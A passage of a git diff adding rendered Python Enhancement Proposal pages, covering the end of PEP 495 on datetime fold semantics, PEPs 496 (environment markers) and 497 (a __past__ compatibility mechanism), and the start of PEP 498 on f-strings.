The sketch above illustrates the relationship between the UTC and +local time around a fall-back transition. The zig-zag line is a graph +of the function implemented by fromutc(). Two intervals on the +UTC axis adjacent to the transition point and having the size of the +time shift at the transition are mapped to the same interval on the +local axis. New implementations of fromutc() method should set +the fold attribute to 1 when self is in the region marked in +yellow on the UTC axis. (All intervals should be treated as closed on +the left and open on the right.)

+
+
+

Mind the Gap

+

The fromutc() method should never produce a time in the gap.

+

If the utcoffset(), tzname() or dst() method is called on a +local time that falls in a gap, the rules in effect before the +transition should be used if fold=0. Otherwise, the rules in +effect after the transition should be used.

+Diagram of relationship between UTC and local time around a spring-forward transition – see full description on page. + +

The sketch above illustrates the relationship between the UTC and +local time around a spring-forward transition. At the transition, the +local clock is advanced skipping the times in the gap. For the +purposes of determining the values of utcoffset(), tzname() +and dst(), the line before the transition is extended forward to +find the UTC time corresponding to the time in the gap with fold=0 +and for instances with fold=1, the line after the transition is +extended back.

+
+
+

Summary of Rules at a Transition

+

On ambiguous/missing times utcoffset() should return values +according to the following table:

            fold=0     fold=1
Fold        oldoff     newoff = oldoff - delta
Gap         oldoff     newoff = oldoff + delta

where oldoff (newoff) is the UTC offset before (after) the +transition and delta is the absolute size of the fold or the gap.

+

Note that the interpretation of the fold attribute is consistent in +the fold and gap cases. In both cases, fold=0 (fold=1) means +use fromutc() line before (after) the transition to find the UTC +time. Only in the “Fold” case, the UTC times u0 and u1 are +“real” solutions for the equation fromutc(u) == t, while in the +“Gap” case they are “imaginary” solutions.

+
+
+

The DST Transitions

+

On a missing time introduced at the start of DST, the values returned +by utcoffset() and dst() methods should be as follows

               fold=0     fold=1
utcoffset()    stdoff     stdoff + dstoff
dst()          zero       dstoff

On an ambiguous time introduced at the end of DST, the values returned +by utcoffset() and dst() methods should be as follows

               fold=0              fold=1
utcoffset()    stdoff + dstoff     stdoff
dst()          dstoff              zero

where stdoff is the standard (non-DST) offset, dstoff is the +DST correction (typically dstoff = timedelta(hours=1)) and zero += timedelta(0).

+
+
+
+

Temporal Arithmetic and Comparison Operators

+
+
+
In mathematicks he was greater
+
Than Tycho Brahe, or Erra Pater:
+
For he, by geometric scale,
+
Could take the size of pots of ale;
+
Resolve, by sines and tangents straight,
+
If bread or butter wanted weight,
+
And wisely tell what hour o’ th’ day
+
The clock does strike by algebra.
+
+
+
– “Hudibras” by Samuel Butler
+
+

The value of the fold attribute will be ignored in all operations +with naive datetime instances. As a consequence, naive +datetime.datetime or datetime.time instances that differ only +by the value of fold will compare as equal. Applications that +need to differentiate between such instances should check the value of +fold explicitly or convert those instances to a timezone that does +not have ambiguous times (such as UTC).
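For example, two naive instances that differ only in fold compare equal:

>>> from datetime import datetime
>>> datetime(2014, 11, 2, 1, 30, fold=0) == datetime(2014, 11, 2, 1, 30, fold=1)
True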

+

The value of fold will also be ignored whenever a timedelta is +added to or subtracted from a datetime instance which may be either +aware or naive. The result of addition (subtraction) of a timedelta +to (from) a datetime will always have fold set to 0 even if the +original datetime instance had fold=1.

+

No changes are proposed to the way the difference t - s is +computed for datetime instances t and s. If both instances +are naive or t.tzinfo is the same instance as s.tzinfo +(t.tzinfo is s.tzinfo evaluates to True) then t - s is a +timedelta d such that s + d == t. As explained in the +previous paragraph, timedelta addition ignores both fold and +tzinfo attributes and so does intra-zone or naive datetime +subtraction.

+

Naive and intra-zone comparisons will ignore the value of fold and +return the same results as they do now. (This is the only way to +preserve backward compatibility. If you need an aware intra-zone +comparison that uses the fold, convert both sides to UTC first.)

+

The inter-zone subtraction will be defined as it is now: t - s is +computed as (t - t.utcoffset()) - (s - +s.utcoffset()).replace(tzinfo=t.tzinfo), but the result will +depend on the values of t.fold and s.fold when either +t.tzinfo or s.tzinfo is post-PEP. [5]

+ +
+

Aware datetime Equality Comparison

+

The aware datetime comparison operators will work the same as they do now, with results indirectly affected by the value of fold whenever the utcoffset() value of one of the operands depends on it, with one exception. Whenever one or both of the operands in an inter-zone comparison is such that its utcoffset() depends on the value of its fold attribute, the result is False. [6]

+ +

Formally, t == s when t.tzinfo is s.tzinfo evaluates to +False can be defined as follows. Let toutc(t, fold) be a +function that takes an aware datetime instance t and returns a +naive instance representing the same time in UTC assuming a given +value of fold:

+
def toutc(t, fold):
+    u = t - t.replace(fold=fold).utcoffset()
+    return u.replace(tzinfo=None)
+
+
+

Then t == s is equivalent to

+
toutc(t, fold=0) == toutc(t, fold=1) == toutc(s, fold=0) == toutc(s, fold=1)
+
+
+
+
+
+

Backward and Forward Compatibility

+

This proposal will have little effect on the programs that do not read +the fold flag explicitly or use tzinfo implementations that do. +The only visible change for such programs will be that conversions to +and from POSIX timestamps will now round-trip correctly (up to +floating point rounding). Programs that implemented a work-around to +the old incorrect behavior may need to be modified.

+

Pickles produced by older programs will remain fully forward +compatible. Only datetime/time instances with fold=1 pickled +in the new versions will become unreadable by the older Python +versions. Pickles of instances with fold=0 (which is the +default) will remain unchanged.

+
+
+

Questions and Answers

+
+

Why not call the new flag “isdst”?

+
+

A non-technical answer

+
    +
  • Alice: Bob - let’s have a stargazing party at 01:30 AM tomorrow!
  • +
  • Bob: Should I presume initially that Daylight Saving Time is or is +not in effect for the specified time?
  • +
  • Alice: Huh?
  • +
+
+
    +
  • Bob: Alice - let’s have a stargazing party at 01:30 AM tomorrow!
  • +
  • Alice: You know, Bob, 01:30 AM will happen twice tomorrow. Which time do you have in mind?
  • +
  • Bob: I did not think about it, but let’s pick the first.
  • +
+
+

(same characters, an hour later)

+
+
    +
  • Bob: Alice - this Py-O-Clock gadget of mine asks me to choose +between fold=0 and fold=1 when I set it for tomorrow 01:30 AM. +What should I do?
  • +
  • Alice: I’ve never heard of a Py-O-Clock, but I guess fold=0 is the first 01:30 AM and fold=1 is the second.
  • +
+
+
+

A technical reason

+

While the tm_isdst field of the time.struct_time object can be +used to disambiguate local times in the fold, the semantics of such +disambiguation are completely different from the proposal in this PEP.

+

The main problem with the tm_isdst field is that it is impossible +to know what value is appropriate for tm_isdst without knowing the +details about the time zone that are only available to the tzinfo +implementation. Thus while tm_isdst is useful in the output of +methods such as time.localtime, it is cumbersome as an input of +methods such as time.mktime.

+

If the programmer misspecified a non-negative value of tm_isdst to +time.mktime, the result will be time that is 1 hour off and since +there is rarely a way to know anything about DST before a call to +time.mktime is made, the only sane choice is usually +tm_isdst=-1.

+

Unlike tm_isdst, the proposed fold attribute has no effect on the interpretation of the datetime instance unless, without that attribute, two (or no) interpretations are possible.

+

Since it would be very confusing to have something called isdst +that does not have the same semantics as tm_isdst, we need a +different name. Moreover, the datetime.datetime class already has +a method called dst() and if we called fold “isdst”, we would +necessarily have situations when “isdst” is zero but dst() is not +or the other way around.

+
+
+
+

Why “fold”?

+

Suggested by Guido van Rossum and favored by one (but initially +disfavored by another) author. A consensus was reached after the +allowed values for the attribute were changed from False/True to 0/1. +The noun “fold” has correct connotations and easy mnemonic rules, but +at the same time does not invite unbased assumptions.

+
+
+

What is “first”?

+

This was a working name of the attribute chosen initially because the +obvious alternative (“second”) conflicts with the existing attribute. +It was rejected mostly on the grounds that it would make True a +default value.

+

The following alternative names have also been considered:

+
+
later
A close contender to “fold”. One author dislikes it because +it is confusable with the equally fitting “latter,” but in the age +of auto-completion everywhere this is a small consideration. A +stronger objection may be that in the case of missing time, we +will have a later=True instance converted to an earlier time by +.astimezone(timezone.utc) than one with later=False. +Yet again, this can be interpreted as a desirable indication that +the original time is invalid.
+
which
The original placeholder name for the localtime function +branch index was independently proposed for the name of the +disambiguation attribute and received some support.
+
repeated
Did not receive any support on the mailing list.
+
ltdf
(Local Time Disambiguation Flag) - short and no-one will attempt +to guess what it means without reading the docs. (This abbreviation +was used in PEP discussions with the meaning ltdf=False is the +earlier by those who didn’t want to endorse any of the alternatives.)
+
+
+
+

Are two values enough?

+

Several reasons have been raised to allow a None or -1 value for +the fold attribute: backward compatibility, analogy with tm_isdst +and strict checking for invalid times.

+
+

Backward Compatibility

+

It has been suggested that backward compatibility can be improved if +the default value of the fold flag were None, which would +signal that pre-PEP behavior is requested. Based on the analysis +below, we believe that the proposed changes with the fold=0 +default are sufficiently backward compatible.

+

This PEP provides only three ways for a program to discover that two +otherwise identical datetime instances have different values of +fold: (1) an explicit check of the fold attribute; (2) if +the instances are naive - conversion to another timezone using the +astimezone() method; and (3) conversion to float using the +timestamp() method.

+

Since fold is a new attribute, the first option is not available +to existing programs. Note that option (2) only works for naive +datetimes that happen to be in a fold or a gap in the system time +zone. In all other cases, the value of fold will be ignored in +the conversion unless the instances use a fold-aware tzinfo +which would not be available in a pre-PEP program. Similarly, the +astimezone() called on a naive instance will not be available in +such a program because astimezone() does not currently work with +naive datetimes.

+

This leaves us with only one situation where an existing program can +start producing different results after the implementation of this PEP: +when a datetime.timestamp() method is called on a naive datetime +instance that happens to be in the fold or the gap. In the current +implementation, the result is undefined. Depending on the system +mktime implementation, programs can see different results or +errors in those cases. With this PEP in place, the value of the timestamp +will be well-defined in those cases but will depend on the value of +the fold flag. We consider the change in +datetime.timestamp() method behavior a bug fix enabled by this +PEP. The old behavior can still be emulated by the users who depend +on it by writing time.mktime(dt.timetuple()) + 1e-6*dt.microsecond +instead of dt.timestamp().
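
+
For concreteness, here is a small sketch of that work-around (the helper name legacy_timestamp is illustrative, not part of the stdlib):

+
import time
+from datetime import datetime
+
+def legacy_timestamp(dt):
+    # Pre-PEP, mktime-based behavior of dt.timestamp() for naive instances,
+    # as described above.
+    return time.mktime(dt.timetuple()) + 1e-6 * dt.microsecond
+
+dt = datetime(2015, 6, 1, 12, 30, 0, 250000)
+print(legacy_timestamp(dt))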

+
+
+

Analogy with tm_isdst

+

The time.mktime interface allows three values for the tm_isdst +flag: -1, 0, and 1. As we explained above, -1 (asking mktime to +determine whether DST is in effect for the given time from the rest of +the fields) is the only choice that is useful in practice.

+

With the fold flag, however, datetime.timestamp() will return +the same value as mktime with tm_isdst=-1 99.98% of the +time for most time zones with DST transitions. Moreover, +tm_isdst=-1-like behavior is specified regardless of the value +of fold.

+

It is only in the 0.02% cases (2 hours per year) that the +datetime.timestamp() and mktime with tm_isdst=-1 may +disagree. However, even in this case, most of the mktime +implementations will return the fold=0 or the fold=1 +value even though relevant standards allow mktime to return -1 and +set an error code in those cases.

+

In other words, tm_isdst=-1 behavior is not missing from this PEP. +To the contrary, it is the only behavior provided in two different +well-defined flavors. The behavior that is missing is when a given +local hour is interpreted as a different local hour because of the +misspecified tm_isdst.

+

For example, in the DST-observing time zones in the Northern +hemisphere (where DST is in effect in June) one can get

+
>>> from time import mktime, localtime
+>>> t = mktime((2015, 6, 1, 12, 0, 0, -1, -1, 0))
+>>> localtime(t)[:]
+(2015, 6, 1, 13, 0, 0, 0, 152, 1)
+
+
+

Note that 12:00 was interpreted as 13:00 by mktime. With +datetime.timestamp and datetime.fromtimestamp, it is currently +guaranteed that

+
>>> t = datetime.datetime(2015, 6, 1, 12).timestamp()
+>>> datetime.datetime.fromtimestamp(t)
+datetime.datetime(2015, 6, 1, 12, 0)
+
+
+

This PEP extends the same guarantee to both values of fold:

+
>>> t = datetime.datetime(2015, 6, 1, 12, fold=0).timestamp()
+>>> datetime.datetime.fromtimestamp(t)
+datetime.datetime(2015, 6, 1, 12, 0)
+
+
+
>>> t = datetime.datetime(2015, 6, 1, 12, fold=1).timestamp()
+>>> datetime.datetime.fromtimestamp(t)
+datetime.datetime(2015, 6, 1, 12, 0)
+
+
+

Thus one of the suggested uses for fold=-1 – to match the legacy +behavior – is not needed. Either choice of fold will match the +old behavior except in the few cases where the old behavior was +undefined.

+
+
+

Strict Invalid Time Checking

+

Another suggestion was to use fold=-1 or fold=None to +indicate that the program truly has no means to deal with the folds +and gaps and dt.utcoffset() should raise an error whenever dt +represents an ambiguous or missing local time.

+

The main problem with this proposal is that dt.utcoffset() is +used internally in situations where raising an error is not an option: +for example, in dictionary lookups or list/set membership checks. So +strict gap/fold checking behavior would need to be controlled by a +separate flag, say dt.utcoffset(raise_on_gap=True, +raise_on_fold=False). However, this functionality can be easily +implemented in user code:

+
class AmbiguousTimeError(ValueError):
+    """Raised when the local time falls in a fold (occurs twice)."""
+
+class MissingTimeError(ValueError):
+    """Raised when the local time falls in a gap (does not occur)."""
+
+def utcoffset(dt, raise_on_gap=True, raise_on_fold=False):
+    # Compare the offsets obtained with the two possible fold values.
+    u = dt.utcoffset()
+    v = dt.replace(fold=not dt.fold).utcoffset()
+    if u == v:
+        return u  # unambiguous time: fold is irrelevant
+    if (u < v) == dt.fold:
+        if raise_on_fold:
+            raise AmbiguousTimeError
+    else:
+        if raise_on_gap:
+            raise MissingTimeError
+    return u
+
+
+

Moreover, raising an error in the problem cases is only one of many +possible solutions. An interactive program can ask the user for +additional input, while a server process may log a warning and take an +appropriate default action. We cannot possibly provide functions for +all possible user requirements, but this PEP provides the means to +implement any desired behavior in a few lines of code.

+
+
+
+
+

Implementation

+ +
+ +
+

Picture Credit

+

This image is a work of a U.S. military or Department of Defense +employee, taken or made as part of that person’s official duties. As a +work of the U.S. federal government, the image is in the public +domain.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0495.rst

+

Last modified: 2024-01-11 16:25:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0496/index.html b/pep-0496/index.html new file mode 100644 index 00000000000..1ca3a94a812 --- /dev/null +++ b/pep-0496/index.html @@ -0,0 +1,268 @@ + + + + + + + + PEP 496 – Environment Markers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 496 – Environment Markers

+
+
Author:
+
James Polley <jp at jamezpolley.com>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Created:
+
03-Jul-2015
+
+
+
+
Table of Contents +
+
+

PEP Status

+

After this PEP was initially drafted, PEP 508 was developed and submitted to +fully specify the dependency declaration syntax, including environment markers. +As a result, this PEP ended up being rejected in favour of the more comprehensive +PEP 508.

+
+
+

Abstract

+

An environment marker describes a condition about the current execution +environment. They are used to indicate when certain dependencies are only +required in particular environments, and to indicate supported platforms +for distributions with additional constraints beyond the availability of a +Python runtime.

+

Environment markers were first specified in PEP 345. PEP 426 +(which would replace PEP 345) proposed extensions to the markers. +When 2.7.10 was released, even these extensions became insufficient due to +their reliance on simple lexical comparisons, and thus this PEP was born.

+
+
+

Rationale

+

Many Python packages are written with portability in mind.

+

For many packages this means they aim to support a wide range of +Python releases. If they depend on libraries such as argparse - +which started as external libraries, but later got incorporated into +core - specifying a single set of requirements is difficult, as the +set of required packages differs depending on the version of Python in +use.

+

For other packages, designing for portability means supporting +multiple operating systems. However, the significant differences +between them may mean that particular dependencies are only needed on +particular platforms (relying on pywin32 only on Windows, for +example).

+

Environment Markers attempt to provide more flexibility in a list of +requirements by allowing the developer to list requirements that are +specific to a particular environment.

+
+
+

Examples

+

Here are some examples of such markers inside a requirements.txt:

+
pywin32 >=1.0 ; sys_platform == 'win32'
+unittest2 >=2.0,<3.0 ; python_version == '2.4' or python_version == '2.5'
+backports.ssl_match_hostname >= 3.4 ; python_version < '2.7.9' or (python_version >= '3.0' and python_version < '3.4')
+
+
+

And here’s an example of some conditional metadata included in +setup.py for a distribution that requires PyWin32 both at runtime and +buildtime when using Windows:

+
setup(
+  install_requires=["pywin32 > 1.0 ; sys_platform == 'win32'"],
+  setup_requires=["pywin32 > 1.0 ; sys_platform == 'win32'"]
+  )
+
+
+
+
+

Micro-language

+

The micro-language behind this is as follows. It compares:

+
    +
  • strings with the == and in operators (and their opposites)
  • +
  • version numbers with the <, <=, >, and >= operators +in addition to those supported for strings
  • +
+

The usual boolean operators and and or can be used to combine +expressions, and parentheses are supported for grouping.

+

The pseudo-grammar is

+
MARKER: EXPR [(and|or) EXPR]*
+EXPR: ("(" MARKER ")") | (STREXPR|VEREXPR)
+STREXPR: STRING [STRCMPOP STREXPR]
+STRCMPOP: ==|!=|in|not in
+VEREXPR: VERSION [VERCMPOP VEREXPR]
+VERCMPOP: (==|!=|<|>|<=|>=)
+
+
+
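For example, string and version comparisons can be combined in a single marker (an illustrative expression, not taken from the PEP itself):

+
python_version >= '2.6' and (sys_platform == 'win32' or os_name == 'nt')
+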

STREXPR is either a Python string (such as 'win32') or one of +the Strings marker variables listed below.

+

VEREXPR is a PEP 440 version identifier, or one of the +Version number marker variables listed below. Comparisons between +version numbers are done using PEP 440 semantics.

+
+

Strings

+
    +
  • os_name: os.name
  • +
  • sys_platform: sys.platform
  • +
  • platform_release: platform.release()
  • +
  • implementation_name: sys.implementation.name
  • +
  • platform_machine: platform.machine()
  • +
  • platform_python_implementation: platform.python_implementation()
  • +
+

If a particular string value is not available (such as sys.implementation.name +in versions of Python prior to 3.3), the corresponding marker +variable MUST be considered equivalent to the empty string.

+

If a particular version number value is not available (such as +sys.implementation.version in versions of Python prior to 3.3) the +corresponding marker variable MUST be considered equivalent to 0.
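
+
A sketch of how a tool might apply the string fallback rule when computing marker values (hypothetical helper code, not part of this PEP):

+
import sys
+
+try:
+    implementation_name = sys.implementation.name
+except AttributeError:
+    # Python < 3.3: the marker MUST evaluate as the empty string
+    implementation_name = ''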

+
+
+

Version numbers

+
    +
  • python_version: platform.python_version()[:3]
  • +
  • python_full_version: see definition below
  • +
  • platform_version: platform.version()
  • +
  • implementation_version: see definition below
  • +
+

The python_full_version and implementation_version marker variables +are derived from sys.version_info and sys.implementation.version +respectively, in accordance with the following algorithm:

+
def format_full_version(info):
+    version = '{0.major}.{0.minor}.{0.micro}'.format(info)
+    kind = info.releaselevel
+    if kind != 'final':
+        version += kind[0] + str(info.serial)
+    return version
+
+python_full_version = format_full_version(sys.version_info)
+implementation_version = format_full_version(sys.implementation.version)
+
+
+

python_full_version will typically correspond to sys.version.split()[0].

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0496.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0497/index.html b/pep-0497/index.html new file mode 100644 index 00000000000..9aa87df4f4b --- /dev/null +++ b/pep-0497/index.html @@ -0,0 +1,401 @@ + + + + + + + + PEP 497 – A standard mechanism for backward compatibility | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 497 – A standard mechanism for backward compatibility

+
+
Author:
+
Ed Schofield <ed at pythoncharmers.com>
+
PEP-Delegate:
+
Brett Cannon <brett at python.org>
+
Status:
+
Rejected
+
Type:
+
Process
+
Created:
+
04-Aug-2015
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

The steering council decided that the __past__ aspect of this proposal +was too complicated for the potential benefit. The other aspect of stronger +requirements for backwards-compatibility should be addressed by PEP 387.

+
+
+

Scope

+

This PEP is complementary to PEPs 5, 236, and 387, and shares similar +goals.

+

This PEP explains the need for an additional compatibility mechanism +in support of PEP 5, “Guidelines for Language Evolution”. PEP 236, +“Back to the __future__”, introduced a mechanism for forward +compatibility in support of PEP 5 but noted that a new mechanism for +backward compatibility was outside the scope of that PEP. A related +PEP (in progress) introduces such a mechanism for backward +compatibility.

+

PEP 5, “Guidelines for Language Evolution”, notes that “This PEP [PEP 5] +does not replace or preclude other compatibility strategies such as +dynamic loading of backwards-compatible parsers.”

+
+
+

Context

+

From PEP 236: “From time to time, Python makes an incompatible change +to the advertised semantics of core language constructs, or changes +their accidental (implementation-dependent) behavior in some way. +While this is never done capriciously, and is always done with the aim +of improving the language over the long term, over the short term it’s +contentious and disrupting. PEP 5, Guidelines for Language Evolution, +suggests ways to ease the pain, and this PEP [PEP 236] introduces some +machinery in support of that.”

+

Also from PEP 236: “The purpose of future_statement is to make life +easier for people who keep current with the latest release in a timely +fashion. We don’t hate you if you don’t, but your problems are much +harder to solve, and somebody with those problems will need to write a +PEP addressing them. future_statement is aimed at a different +audience.”

+
+
+

The current situation

+

When an incompatible change to core language syntax or semantics is +being made, Python currently provides the future_statement mechanism +for providing forward compatibility until the release that enforces +the new syntax or semantics, but provides no corresponding standard +mechanism for providing backward compatibility after this release.

+
+
+

Problem

+

A consequence of this asymmetry is that, with respect to a breaking +change, the older (pre-breaking) version of the Python interpreter is +more capable than the newer (breaking) version; the older interpreter +can use both code designed prior to the change and newer code, whereas +the newer interpreter is only capable of using code that has been +upgraded to support the changed feature.

+

As an example, consider the changes to the division operator +introduced in PEP 238 in 2001, soon after PEP 236 introduced the +future_statement mechanism. PEP 238 outlines a suite of useful +forward-compatibility mechanisms for “true division” in the Python 2.x +series but omits to include any backward-compatibility mechanisms for +after “true division” was first enforced in Python 3.0. Python versions +since 3.0 do not provide a backward compatibility mechanism such as +from __past__ import division for code that expects the old +“classic division” semantics, whereas Python versions prior to 3.0 do +support both “classic division” code and also forward compatibility +with code expecting “true division”. A further consequence of this is +that the “most compatible” interpreter with respect to the variety of +division-related Python code in the wild is Python 2.7, the version +before the breaking change was first enforced.

+
+
+

Backward compatibility as enabler for “downhill upgrades”

+

In contrast to this situation, newer versions of application software +such as office suites tend to be more capable than earlier versions +with respect to their support for loading different versions of their +data file formats. The pattern is usually that the newer application +versions can transparently load data from either their newer or their +older data formats, and that the newer version defaults to saving data +in the newer format. Newer application software versions tend to be +backward-compatible by default. Forward compatibility is relatively +rare.

+

This policy puts the user of the newer application software at an +advantage over the user of the older software, which is usually +incapable of loading data in the newer format. Sometimes it is +possible for a user of a newer software application version to export +data in an older version by choosing this option explicitly. In these +cases, the forward-compatibility this enables may or may not be +perfect; some features may be missing or the results may be otherwise +suboptimal. Upgrading is therefore easy, whereas downgrading is +harder.

+

The emergent behaviour over many users from such a policy of new +attractive features plus backward compatibility features is that a +natural pressure builds up on each individual user to upgrade his or +her own application version, and the more other users an individual +exchanges data files with, the more acute this pressure becomes.

+
+
+

Proposal - part 1

+

This PEP makes two specific, related proposals. The first is that:

+
+
PEP 5 be augmented with a 6th step in the section “Steps for +Introducing Backwards-Incompatible Features” to indicate that, when an +incompatible change to core language syntax or semantics is being +made, Python-dev’s policy is to prefer and expect that, wherever +possible, a mechanism for backward compatibility be considered and +provided for future Python versions after the breaking change is +adopted by default, in addition to any mechanisms proposed for forward +compatibility such as new future_statements. Furthermore, PEP 387, +“Backwards Compatibility Policy” (if accepted) would be +augmented with the same 6th step.
+
+

Example

+

As an example of how this PEP is to be applied, if the latest revision +of the “true division” PEP (238) were proposed today, it would be +considered incomplete. PEP 238 notes the “severe backwards +compatibility issues” raised by the proposal and describes several +measures for forward compatibility in the Abstract and API Changes +sections. It also mentions some backward compatibility ideas raised on +c.l.py, including “Use from __past__ import division to use +classic division semantics in a module”, but it does not put forward +any backward compatibility plan as part of the proposal.

+

If this PEP is accepted, it would be expected that a proposal such as +PEP 238, because of its large-scale compatibility implications, would +also be accompanied by a backward compatibility plan that enables +users of future Python versions after the breaking change has come +into effect to re-enable the classic division behaviour easily in +their code.

+
+
+
+

Proposal - part 2

+

The second proposal is that:

+
+
Python provide a standard backward compatibility mechanism in +parallel to the __future__ module mechanism for forward +compatibility.
+

For reference, this document will refer to this as a “__past__” +mechanism hereon, although it need not have all the characteristics +of the __future__ module and future_statement mechanism.

+

The specific form and implementation of the __past__ mechanism is +the subject of a separate PEP (in progress). However, this PEP +recommends that this __past__ mechanism be designed to meet +similar criteria to those outlined in PEP 296 for __future__. +Specifically:

+

a. It should enable individual modules to specify obsolete behaviours +to re-enable from older Python versions on a module-by-module basis.

+

b. It should be flexible enough for both Python 3.6+ and point +releases of earlier versions to reintroduce backward compatibility +with older Python syntax or semantics for user modules that invoke the +__past__ mechanism.

+

c. It should be possible to run older code augmented to invoke +__past__ behaviours on older Python versions such as 2.x that have +no knowledge of the specific __past__ features invoked, or even +that the __past__ mechanism for backward-compatibility exists.
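
+
One hypothetical shape such an invocation could take, meeting criterion (c) by degrading gracefully on older interpreters, is sketched below (purely illustrative; no __past__ module exists, and the actual design is left to the separate PEP):

+
try:
+    from __past__ import division  # hypothetical; would re-enable classic division
+except ImportError:
+    pass  # older Pythons: classic division is already the default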

+
+

Counter-examples

+

Some implementations of __past__ mechanisms that would violate +these criteria are:

+

a. Import hooks. These would normally fail to work on a +module-by-module basis; instead they apply recursively to all new +modules imported from within a module.

+

b. A new piece of syntax or new semantics for Python 3.6 that is +incompatible with prior versions.

+

c. A function added in Python 3.6 to a module in the Python standard +library that exists under the same name in prior Python versions.

+
+
+
+

Benefits

+

The benefit to Python-dev of adopting this proposal is that future +backward-incompatible changes can be less disruptive if these changes +each have a corresponding __past__ feature that has been +implemented and can be invoked easily by users of future Python +versions. This can help the language to evolve more quickly and more +effectively to correct for design mistakes.

+

The benefit to conservative users is obvious: they can add support for +the latest shiny compatibility-breaking Python version to their code +merely by adding a __past__ incantation (perhaps a single line) to +each module, and this can be automated. They can then upgrade +their interpreter to the latest version and gain access to the latest +shiny Python features.

+

The benefit to the community is that, if ten thousand users rely on +package XYZ, and package XYZ can trivially add support for the latest +Python version, those ten thousand users can also upgrade to the +latest Python version quickly, without being held back waiting for +package XYZ to do this.

+
+
+

Questions and answers

+

Q1: Does this PEP require that Python keep two possible sets of semantics +for each backward-incompatible feature forever?

+

A1: Definitely not. Legacy features can still be phased out when +appropriate – that is, when the majority of the user-base has +migrated to the newer Python version. This PEP merely proposes to +shift the emphasis of the development effort directed at compatibility +from 100% forwards to at least 50% backwards. Backwards compatibility +is the more powerful of the two concepts for allowing a user-base to +adopt the latest Python interpreter version.

+

Notice that it has been a long time since most users have cared about +backwards compatibility for non-nested scopes, because most users have +moved comfortably past Python 2.1.

+

Q2: But Python-dev is already overwhelmed and doesn’t have the +bandwidth to implement / maintain the additional complexity!

+

A2: Python-dev can ask the community of developers to step up and +maintain backward compatibility in Python for legacy language features +they care about. When the community stops caring about a particular +obsolete behaviour, Python-dev can stop caring too.

+

The __past__ mechanism could possibly be designed to be extensible +by the community, e.g. as a standard but “blessed” PyPI package, to +reduce the load on the core developers.

+

Q3: Won’t backward compatibility features lead to lots of cruft and +bloat and baggage in Python?

+

A3: Not necessarily. First, proposals for new compatibility-breaking +features in Python could be evaluated partly on the simplicity and +maintainability of the implementation of their associated __past__ +feature up-front.

+

Second, some old features are simple to provide backward compatibility +for. Consider the “classic division” behaviour before Python 3.0. The +python-future project contains a compatible implementation of +classic division in the function future.utils.old_div:

+
import numbers
+
+def old_div(a, b):
+    """
+    Equivalent to ``a / b`` on Python 2 without ``from __future__ import
+    division``.
+    """
+    if isinstance(a, numbers.Integral) and isinstance(b, numbers.Integral):
+        return a // b
+    else:
+        return a / b
+
+
+

Bundling such a function with Python 3.x versions, together with +a simple mechanism to invoke it for every appearance of a +/ b after an appropriate __past__ invocation, need not be +onerous.

+

Q4: What about performance? Won’t the performance of newer Python +versions suffer under the weight of legacy features?

+

A4: This can be evaluated on a case-by-case basis. The major potential +concern is that the performance with the new default behaviour does +not suffer unduly because of the presence of the legacy option. The +performance under the influence of the __past__ invocation is of +secondary importance.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0497.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0498/index.html b/pep-0498/index.html new file mode 100644 index 00000000000..ee4cee0a45f --- /dev/null +++ b/pep-0498/index.html @@ -0,0 +1,891 @@ + + + + + + + + PEP 498 – Literal String Interpolation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 498 – Literal String Interpolation

+
+
Author:
+
Eric V. Smith <eric at trueblade.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-Aug-2015
+
Python-Version:
+
3.6
+
Post-History:
+
07-Aug-2015, 30-Aug-2015, 04-Sep-2015, 19-Sep-2015, 06-Nov-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Python supports multiple ways to format text strings. These include +%-formatting [1], str.format() [2], and string.Template +[3]. Each of these methods has its advantages, but in addition +has disadvantages that make it cumbersome to use in practice. This +PEP proposes to add a new string formatting mechanism: Literal String +Interpolation. In this PEP, such strings will be referred to as +“f-strings”, taken from the leading character used to denote such +strings, and standing for “formatted strings”.

+

This PEP does not propose to remove or deprecate any of the existing +string formatting mechanisms.

+

F-strings provide a way to embed expressions inside string literals, +using a minimal syntax. It should be noted that an f-string is really +an expression evaluated at run time, not a constant value. In Python +source code, an f-string is a literal string, prefixed with ‘f’, which +contains expressions inside braces. The expressions are replaced with +their values. Some examples are:

+
>>> import datetime
+>>> name = 'Fred'
+>>> age = 50
+>>> anniversary = datetime.date(1991, 10, 12)
+>>> f'My name is {name}, my age next year is {age+1}, my anniversary is {anniversary:%A, %B %d, %Y}.'
+'My name is Fred, my age next year is 51, my anniversary is Saturday, October 12, 1991.'
+>>> f'He said his name is {name!r}.'
+"He said his name is 'Fred'."
+
+
+

A similar feature was proposed in PEP 215. PEP 215 proposed to support +a subset of Python expressions, and did not support the type-specific +string formatting (the __format__() method) which was introduced +with PEP 3101.

+
+
+

Rationale

+

This PEP is driven by the desire to have a simpler way to format +strings in Python. The existing ways of formatting are either error +prone, inflexible, or cumbersome.

+

%-formatting is limited as to the types it supports. Only ints, strs, +and doubles can be formatted. All other types are either not +supported, or converted to one of these types before formatting. In +addition, there’s a well-known trap where a single value is passed:

+
>>> msg = 'disk failure'
+>>> 'error: %s' % msg
